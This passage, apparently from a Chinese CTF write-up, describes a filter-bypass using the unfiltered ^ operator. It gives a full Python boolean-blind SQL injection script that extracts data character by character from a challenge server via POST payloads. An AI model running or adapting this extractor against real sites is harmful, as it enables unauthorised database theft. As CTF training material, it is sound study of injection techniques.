,or,&&,||,#,--+,",' '等都过滤了,但^没过滤,先手工尝试,成功测出数据库长度为11,可行。
接着用布尔盲注的脚本爆破,因为是post传参,要改一下写法:
import requests
def check_res(res):
if "girlfriend" in res.text:
return True
#elif "登录失败" in res.text:
# return False
else:
return False
def res_length(exp):
length = 0
sess = requests.session()
while True:
sql_exp = "length((%s))>%d" % (exp,length)
url = "http://node2.anna.nssctf.cn:28081/index.php" #根据猜测的sql语句进行参数id的闭合
data={"id":"0^({})".format(sql_exp)}
res = sess.post(url,data=data)
if not check_res(res):
break
length += 1
return length
def res_result(exp, length):
result = ""
sess = requests.session()
for i in range(length):
left = 0
right = 1270
while True:
mid = (left+right) // 2
if mid == left:
result += chr(right)
break
sql_exp = "ascii(substr((%s),%d,1))>%d" % (exp, i+1 , mid)
url = "http://node2.anna.nssctf.cn:28081/index.php" #根据猜测的sql语句进行参数id的闭合
data={"id":"0^({})".format(sql_exp)}
res = sess.post(url,data=data)
if check_res(res):
left = mid
else:
right = mid
return result
if __name__ == '__main__':
while True:
exp = input(">>>请输入SQL语句:")
length = res_length(exp)
print("[+]length :%d" % (length))
result = res_result(exp, length)
print("[+]result:%s" % (result))exp:select(flag)from(flag)
因为length的返回值应该是无符号型的,所以和-1等负数比较会出错,一开始测长度的初始值是-1,结果一直不知道错哪。